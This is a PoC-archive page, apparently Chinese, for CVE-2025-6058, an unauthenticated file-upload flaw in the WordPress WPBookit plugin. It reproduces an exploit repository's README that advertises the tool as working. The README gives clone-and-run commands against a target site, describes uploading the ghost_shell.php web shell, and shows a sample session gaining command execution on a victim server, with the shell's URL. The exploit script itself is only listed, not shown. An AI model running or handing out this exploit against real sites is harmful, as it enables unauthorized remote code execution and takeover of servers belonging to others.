关联漏洞
标题:
WordPress plugin WPBookit 代码问题漏洞
(CVE-2025-6058)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WPBookit 1.0.4及之前版本存在代码问题漏洞,该漏洞源于image_upload_handle函数缺少文件类型验证,可能导致未经验证的攻击者上传任意文件。
描述
WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit
介绍
<p align="center">
<img src="https://s.w.org/style/images/about/WordPress-logotype-alternative.png" alt="WordPress Logo" width="200">
</p>
<h1 align="center">🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit</h1>
<p align="center">
<img src="https://img.shields.io/badge/Exploit-Type-File%20Upload-red?style=flat-square">
<img src="https://img.shields.io/badge/Platform-WordPress-blue?style=flat-square">
<img src="https://img.shields.io/badge/Status-Working-brightgreen?style=flat-square">
<img src="https://img.shields.io/github/license/0xgh057r3c0n/CVE-2025-6058?style=flat-square">
</p>
<p align="center">
<b>Unauthenticated Arbitrary File Upload Exploit targeting WordPress WPBookit Plugin (≤ 1.0.4)</b><br>
Exploit allows remote shell upload and full command execution.<br><br>
<a href="https://github.com/0xgh057r3c0n">Author: 0xgh057r3c0n</a>
</p>
---
## 📌 About The Vulnerability
**CVE-2025-6058** is a critical vulnerability affecting the **WPBookit** plugin on WordPress CMS. An unauthenticated attacker can abuse a vulnerable AJAX endpoint to upload arbitrary PHP files, enabling **Remote Code Execution (RCE)**.
- 🎯 **Target**: WordPress CMS (vulnerable WPBookit plugin)
- 📦 **Plugin Affected**: WPBookit ≤ 1.0.4
- ⚠️ **Risk Level**: Critical (Unauthenticated RCE)
---
## ✨ Features
- 🔍 Auto-detects WordPress plugin version via `README.txt`
- 📤 Uploads lightweight PHP shell (`ghost_shell.php`)
- 🖥️ Interactive shell (Parrot-style prompt)
- 🌐 Unauthenticated — No login required
- 🎨 Colorized CLI Output
---
## 🚀 Usage Guide
### 💻 Requirements
```bash
python3 --version
pip install requests
````
---
### ⚙️ Exploit Execution
```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
```
---
## 🛠️ Example Shell Session
```bash
python3 CVE-2025-6058.py -u https://victim.com
[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.
[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] Interactive GhostShell Started — type 'exit' to quit.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
```
---
## 📂 Shell Details
* **File Name**: `ghost_shell.php`
* **Path**: `/wp-content/uploads/YYYY/MM/ghost_shell.php`
* **Example**:
```
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
```
---
## ⚠️ Legal Disclaimer
> This exploit is developed for **educational purposes** and authorized penetration testing only. Unauthorized use against systems without explicit consent is **illegal**.
---
## 📄 License
Released under [MIT License](LICENSE)
---
<p align="center">
Made for WordPress security auditing 🛡️ by <a href="https://github.com/0xgh057r3c0n">0xgh057r3c0n</a>
</p>
文件快照
[4.0K] /data/pocs/6dfac5f35344c8cec8674dc1939b932a7fd33c42
├── [6.4K] CVE-2025-6058.py
├── [3.2K] CVE-2025-6058.yaml
├── [1.1K] LICENSE
└── [3.0K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。